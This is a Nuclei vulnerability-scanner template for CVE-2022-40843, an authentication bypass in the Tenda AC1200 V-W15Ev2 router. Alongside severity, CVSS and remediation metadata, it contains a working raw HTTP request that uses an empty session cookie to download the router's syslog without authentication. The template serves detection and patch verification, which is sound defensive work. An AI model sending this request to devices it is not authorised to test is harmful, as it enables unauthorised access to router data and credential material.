nuclei-templates/http/cves/2022/CVE-2022-40843.yaml

59 lines
2.0 KiB
YAML

id: CVE-2022-40843
info:
name: Tenda AC1200 V-W15Ev2 - Authentication Bypass
author: gy741
severity: medium
description: |
The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.
remediation: |
Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.
reference:
- https://boschko.ca/tenda_ac1200_router
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
cvss-score: 4.9
cve-id: CVE-2022-40843
cwe-id: CWE-287
epss-score: 0.33771
epss-percentile: 0.96637
cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: tenda
product: w15e_firmware
tags: cve,cve2022,tenda,auth-bypass,router,iot
http:
- raw:
- |
GET /goform/downloadSyslog/syslog.log HTTP/1.1
Host: {{Hostname}}
Cookie: W15Ev2_user=
matchers-condition: and
matchers:
- type: regex
regex:
- '^0\d{3}$'
- type: word
part: body
words:
- "[system]"
- "[error]"
- "[wan1]"
condition: or
- type: word
part: header
words:
- "Content-type: config/conf"
- type: status
status:
- 200
# digest: 4a0a00473045022100a0c8950534d6226b9eb49a0eef34ecf9545e4f6929c478ba965996e505ca7b2f022009df964f6855fcd2f0b1508332147f36e1218787a987fe54fccd56c65e857167:922c64590222798bb761d5b6d8e72950